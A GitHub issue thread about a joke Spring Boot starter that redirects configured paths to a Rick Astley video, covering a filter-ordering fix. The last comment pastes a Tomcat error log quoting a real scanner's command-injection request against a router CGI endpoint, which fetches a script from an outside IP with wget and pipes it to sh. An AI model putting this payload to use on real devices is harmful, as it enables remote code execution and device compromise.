search

TomCools / rickroll-security-spring-boot-starter

This Spring Boot Starter will reroute configured paths to a video of Rick Astley - Never Gonna Give You Up.
47 stars 6 forks source link

Can't rickroll when RequestRejectedException is thrown #20

Open tschuehly opened 4 months ago

tschuehly commented 4 months ago

My wordpress guys can't formulate proper URLs: image

The request is rejected before the filter and the rickroll is not applied.

I've tried adding an ExceptionAdvice but Spring routes to the /error endpoint before the Exception is caught

    @ExceptionHandler(RequestRejectedException::class)
    @ResponseBody
    fun handleRequestRejected(e: RequestRejectedException, response: HttpServletResponse) {
        response.sendRedirect("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
    }
TomCools commented 4 months ago

Thanks for the report! Will look into this.

TomCools commented 4 months ago

@tschuehly found the issue, simple missing @Order annotation on the Filter. I do have some issues with my release setup, so it'll be for tomorrow morning.

TomCools commented 4 months ago

@tschuehly: This has been included in a new release: https://github.com/TomCools/rickroll-security-spring-boot-starter/releases/tag/v3.2.1.

I'll close this ticket once you've confirmed it works for you as well ;)

tschuehly commented 3 months ago

Hey @TomCools the fix works!

It doesn't apply if tomcat catches the request because of an invalid character. This one clogs my logs aswell 😔

java.lang.IllegalArgumentException: Invalid character found in the request target [/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) ]. 
The valid characters are defined in RFC 7230 and RFC 3986
    at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:264) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
    at java.base/java.lang.Thread.run(Unknown Source) ~[na:na]